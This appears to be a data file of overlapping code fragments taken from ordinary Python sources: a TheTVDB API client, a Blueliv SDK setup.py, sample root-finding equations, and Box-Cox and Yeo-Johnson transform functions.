requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com'", "'firstAired') if shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is", "= requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers jwt = response.json()['token'] headers['Authorization']", "'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers", "json=data) if response.status_code == 200: global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer", "'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data", "show in shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url", "{'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if", "== 200: global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt", "= f'Bearer {jwt}' return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json()", "+ url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list,", "(show.get(col) if show.get(col) is not None else 'Not Available' for col in cols_needed)))", "else 'Not Available' for col in cols_needed))) for show in shows['data']) def get_image(url):", "f'Bearer {jwt}' return jwt def search_show(show_name): shows = 
requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed", "f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count)", "requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers jwt =", "'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None yield from ( dict(zip(cols_needed,", "# path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400)", "running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com'", "= f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return season_list,", "headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return requests.get(resource_base_url_per_ep", "cols_needed))) for show in shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def", "show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'):", "with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers jwt", "= requests.get(url, headers=headers).json() 
season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url):", "backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep", "= response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series',", "*_ = response_json['data'].values() return season_list, int(episode_count) def get_image_per_ep(url): return requests.get(resource_base_url_per_ep + url, headers=headers).content", "response_json = requests.get(url, headers=headers).json() season_list, episode_count, *_ = response_json['data'].values() return season_list, int(episode_count) def", "headers = {} def get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'}", "jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name): shows =", "is not None else 'Not Available' for col in cols_needed))) for show in", "'https://thetvdb.com/banners/' headers = {} def get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey':", "return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url,", "search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image',", "'overview', 'network', 'firstAired') if shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col) if", "params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if", "= 
requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status', 'image', 'overview', 'network',", "if shows.get('Error'): return None yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not", "response = requests.post(f'{api_base_url}/login', json=data) if response.status_code == 200: global headers jwt = response.json()['token']", "in shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url =", "import requests import requests_cache # path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400)", "{jwt}' return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed =", "shows['data']) def get_image(url): return requests.get(resource_base_url + url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary'", "data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login',", "<gh_stars>0 import requests import requests_cache # path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite',", "'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data) if response.status_code", "def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName', 'status',", "gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', 
expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url =", "= {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response = requests.post(f'{api_base_url}/login', json=data)", "if response.status_code == 200: global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}'", "= ('id', 'seriesName', 'status', 'image', 'overview', 'network', 'firstAired') if shows.get('Error'): return None yield", "Available' for col in cols_needed))) for show in shows['data']) def get_image(url): return requests.get(resource_base_url", "response.status_code == 200: global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return", "from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url", "global headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name):", "# requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/'", "when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url =", "headers jwt = response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name): shows", "jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name': show_name}, headers=headers).json() cols_needed = ('id', 'seriesName',", "'https://api.thetvdb.com' 
resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {} def get_jwt(): data = {'apikey': 'api_key',", "path when running from gui requests_cache.install_cache(cache_name='../common/cache/api', backend='sqlite', expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url", "col in cols_needed))) for show in shows['data']) def get_image(url): return requests.get(resource_base_url + url,", "show.get(col) is not None else 'Not Available' for col in cols_needed))) for show", "None else 'Not Available' for col in cols_needed))) for show in shows['data']) def", "expire_after=86400) # requests_cache.install_cache(cache_name='../../common/cache/api', backend='sqlite', expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep =", "yield from ( dict(zip(cols_needed, (show.get(col) if show.get(col) is not None else 'Not Available'", "for col in cols_needed))) for show in shows['data']) def get_image(url): return requests.get(resource_base_url +", "expire_after=86400) resource_base_url = 'https://thetvdb.com' api_base_url = 'https://api.thetvdb.com' resource_base_url_per_ep = 'https://thetvdb.com/banners/' headers = {}", "def get_jwt(): data = {'apikey': 'api_key', 'username': 'username', 'userkey': 'user_key'} with requests_cache.disabled(): response", "response.json()['token'] headers['Authorization'] = f'Bearer {jwt}' return jwt def search_show(show_name): shows = requests.get(f'{api_base_url}/search/series', params={'name':", "url, headers=headers).content def get_episode_count(show_id): url = f'{api_base_url}/series/{show_id}/episodes/summary' response_json = requests.get(url, headers=headers).json() season_list, episode_count," ]
[ "Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python", "find_packages setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT',", ":: Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming Language ::", "Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language", "from setuptools import setup, find_packages setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python',", "classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Topic ::", "Python :: 3.3', 'Programming Language :: Python :: 3.4', ], keywords='blueliv api crime", "Developers', 'Topic :: Software Development :: Build Tools', 'License :: OSI Approved ::", "2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7',", "Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python", ":: MIT License', 'Programming Language :: Python :: 2', 'Programming Language :: Python", ":: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python ::", "url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience", "3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4',", "api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), install_requires=['requests>=2.4.0, <= 2.5.1', 'python-dateutil>=2.4.0'],", "Language :: Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming Language", "author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience ::", "- Production/Stable', 
'Intended Audience :: Developers', 'Topic :: Software Development :: Build Tools',", "name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development", ":: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python ::", "Development :: Build Tools', 'License :: OSI Approved :: MIT License', 'Programming Language", "2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.2',", ":: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language ::", "'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming", ":: 3', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python ::", "setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[", "setup, find_packages setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>',", ":: 5 - Production/Stable', 'Intended Audience :: Developers', 'Topic :: Software Development ::", "3.3', 'Programming Language :: Python :: 3.4', ], keywords='blueliv api crime servers bot", ":: 3.3', 'Programming Language :: Python :: 3.4', ], keywords='blueliv api crime servers", "description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status ::", "for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable',", ":: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming 
Language ::", ":: 3.4', ], keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']),", "'Topic :: Software Development :: Build Tools', 'License :: OSI Approved :: MIT", ":: Python :: 3.3', 'Programming Language :: Python :: 3.4', ], keywords='blueliv api", "'Programming Language :: Python :: 3.4', ], keywords='blueliv api crime servers bot ips", "'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 2',", "5 - Production/Stable', 'Intended Audience :: Developers', 'Topic :: Software Development :: Build", "2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3',", "Production/Stable', 'Intended Audience :: Developers', 'Topic :: Software Development :: Build Tools', 'License", "], keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), install_requires=['requests>=2.4.0, <=", ":: OSI Approved :: MIT License', 'Programming Language :: Python :: 2', 'Programming", "Audience :: Developers', 'Topic :: Software Development :: Build Tools', 'License :: OSI", "Tools', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python ::", "'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming", "setuptools import setup, find_packages setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk',", "keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), install_requires=['requests>=2.4.0, <= 2.5.1',", "3.4', ], keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), install_requires=['requests>=2.4.0,", "'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming", "MIT License', 'Programming Language :: Python :: 2', 
'Programming Language :: Python ::", "'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', ],", ":: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language ::", "Approved :: MIT License', 'Programming Language :: Python :: 2', 'Programming Language ::", "OSI Approved :: MIT License', 'Programming Language :: Python :: 2', 'Programming Language", "'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Topic :: Software", ":: Developers', 'Topic :: Software Development :: Build Tools', 'License :: OSI Approved", "Build Tools', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python", "Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python", "3', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3',", ":: Python :: 3.4', ], keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib',", "'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming", "Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language", ":: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python ::", "API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5", "author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers',", "Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python", "Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Topic :: Software Development", "'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming", "Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python", "License', 'Programming Language :: Python 
:: 2', 'Programming Language :: Python :: 2.6',", "Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language", "license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Topic", "Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language", "Language :: Python :: 3.4', ], keywords='blueliv api crime servers bot ips security',", "crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), install_requires=['requests>=2.4.0, <= 2.5.1', 'python-dateutil>=2.4.0'], test_requires=['mock']", "version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status", ":: Build Tools', 'License :: OSI Approved :: MIT License', 'Programming Language ::", "Software Development :: Build Tools', 'License :: OSI Approved :: MIT License', 'Programming", "'Intended Audience :: Developers', 'Topic :: Software Development :: Build Tools', 'License ::", ":: Software Development :: Build Tools', 'License :: OSI Approved :: MIT License',", ":: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language ::", "servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), install_requires=['requests>=2.4.0, <= 2.5.1', 'python-dateutil>=2.4.0'], test_requires=['mock'] )", "SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 -", "Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', ], keywords='blueliv", "Python :: 3.4', ], keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs',", "import setup, find_packages setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for 
Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv',", ":: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python ::", "Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended" ]
[ "# Equation 2 def eq2(x): return (pow(x, 2) - 4) def eq2_d(x): return", "Sample Equations # # Description: Sample functions (and their derivatives) # to be", "Equations # # Description: Sample functions (and their derivatives) # to be used", "5*x + 1 def eq1_d(x): return 5*(x**4) - 5 # Equation 2 def", "(and their derivatives) # to be used with the root-finding algorithms. # #Equation", "eq1(x): return x**5 - 5*x + 1 def eq1_d(x): return 5*(x**4) - 5", "def eq1(x): return x**5 - 5*x + 1 def eq1_d(x): return 5*(x**4) -", "the root-finding algorithms. # #Equation 1 def eq1(x): return x**5 - 5*x +", "be used with the root-finding algorithms. # #Equation 1 def eq1(x): return x**5", "- 5*x + 1 def eq1_d(x): return 5*(x**4) - 5 # Equation 2", "- 5 # Equation 2 def eq2(x): return (pow(x, 2) - 4) def", "5 # Equation 2 def eq2(x): return (pow(x, 2) - 4) def eq2_d(x):", "5*(x**4) - 5 # Equation 2 def eq2(x): return (pow(x, 2) - 4)", "# Description: Sample functions (and their derivatives) # to be used with the", "Equation 2 def eq2(x): return (pow(x, 2) - 4) def eq2_d(x): return 2*x", "with the root-finding algorithms. # #Equation 1 def eq1(x): return x**5 - 5*x", "their derivatives) # to be used with the root-finding algorithms. # #Equation 1", "x**5 - 5*x + 1 def eq1_d(x): return 5*(x**4) - 5 # Equation", "return x**5 - 5*x + 1 def eq1_d(x): return 5*(x**4) - 5 #", "+ 1 def eq1_d(x): return 5*(x**4) - 5 # Equation 2 def eq2(x):", "to be used with the root-finding algorithms. # #Equation 1 def eq1(x): return", "# # Description: Sample functions (and their derivatives) # to be used with", "return 5*(x**4) - 5 # Equation 2 def eq2(x): return (pow(x, 2) -", "def eq1_d(x): return 5*(x**4) - 5 # Equation 2 def eq2(x): return (pow(x,", "used with the root-finding algorithms. # #Equation 1 def eq1(x): return x**5 -", "functions (and their derivatives) # to be used with the root-finding algorithms. #", "# to be used with the root-finding algorithms. 
# #Equation 1 def eq1(x):", "derivatives) # to be used with the root-finding algorithms. # #Equation 1 def", "# Sample Equations # # Description: Sample functions (and their derivatives) # to", "# #Equation 1 def eq1(x): return x**5 - 5*x + 1 def eq1_d(x):", "root-finding algorithms. # #Equation 1 def eq1(x): return x**5 - 5*x + 1", "1 def eq1(x): return x**5 - 5*x + 1 def eq1_d(x): return 5*(x**4)", "Description: Sample functions (and their derivatives) # to be used with the root-finding", "eq1_d(x): return 5*(x**4) - 5 # Equation 2 def eq2(x): return (pow(x, 2)", "algorithms. # #Equation 1 def eq1(x): return x**5 - 5*x + 1 def", "#Equation 1 def eq1(x): return x**5 - 5*x + 1 def eq1_d(x): return", "Sample functions (and their derivatives) # to be used with the root-finding algorithms.", "1 def eq1_d(x): return 5*(x**4) - 5 # Equation 2 def eq2(x): return" ]
[ "y.ndim - 1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2", "xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1) ks_mask = ks < best_ks", "ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) **", "= xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for lam in xp.around(xp.arange(*lam_range), 6): if yj:", "ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask &", "inv transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return", "the the most normally distributed result.\"\"\" # TODO currently this just minimizes the", "1.0 - xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) ==", "distribution CDF, batched.\"\"\" t = x - mu[:, None] y = 0.5 *", "* y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0 ret[(~pos_mask)", "& zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0)", "lam): \"\"\"Inverse Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1", "@sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in =", "- 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) ** (1.0", "(sigma[:, None] * xp.sqrt(2.0))) # pylint: disable=no-member y[y > 1.0] = 1.0 return", "axis is None: # a = xp.ravel(a) # axis = 0 axis =", "inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\" y_in =", "_ = boxcox(y_in, lam) ys = xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1) /", "None self.lam2 = None def fit(self, y): \"\"\"Fit the batched 1d variables in", "in the first dimension.\"\"\" y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1),", 
"\"\"\"Init lambda storage.\"\"\" self.lam1 = None def fit(self, y): \"\"\"Fit the batched 1d", "return ret def inv(self, y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\" return", "Box-Cox transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2", "= xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) /", "lam2): \"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) ret", "xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask]", "__init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 = None def", "+ lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs", "be better organized... @sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the first", "- lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask])", "pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask]", "best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class", "ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] +", "zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1,", "xp.around(xp.arange(*lam_range), 6): if yj: yp, _ = yeojohnson(y, lam) else: yp, _, _", "> 1.0] = 1.0 return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)):", "((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0)", "axis = 0 axis = y.ndim - 1 y_in = y.astype(xp.float64) 
lam1 =", "result.\"\"\" # TODO currently this just minimizes the KS-stat, # would might better", "y_in[(~pos_mask) & two_mask]) return ret, lam1[:, 0][..., None] @sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse", "(lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return ret", "transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return ret", "y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0) ret[(~pos_mask) &", "grid search, taking the the most normally distributed result.\"\"\" # TODO currently this", "y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2 is None: lam2", "might better to used shapiro-wilk or 'normaltest' but we'd need a batched version", "if yj: yp, _ = yeojohnson(y, lam) else: yp, _, _ = boxcox(y_in,", "y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a power", "self.lam1 = yeojohnson(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform using", "= yeojohnson(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform using the", "disable=unused-variable from ..numerical_libs import sync_numerical_libs, xp # TODO this could be better organized...", "4) == 2.0 pos_mask = y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape)", "/ lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0", "* y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask]", "# TODO currently this just minimizes the KS-stat, # would might better to", "transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None def fit(self,", "the inv transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None])", "y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 
ret[zero_mask]", "is None: lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask", "dimension.\"\"\" y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0", "lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=False) ret, self.lam1, self.lam2 =", "inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64)", "return inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def", "= xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape)", "TODO currently this just minimizes the KS-stat, # would might better to used", "0][..., None] @sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform, batched in the first", "= fit_lam(y, yj=False) ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None]) return ret def", "yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1", "1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2 is None:", "y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape)", "y[y > 1.0] = 1.0 return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2,", "most normally distributed result.\"\"\" # TODO currently this just minimizes the KS-stat, #", "dimension.\"\"\" # TODO add axis param # if axis is None: # a", "a batched version y_in = xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks = xp.full(batch_size, xp.inf)", "): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 = None def fit(self, y):", "batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 
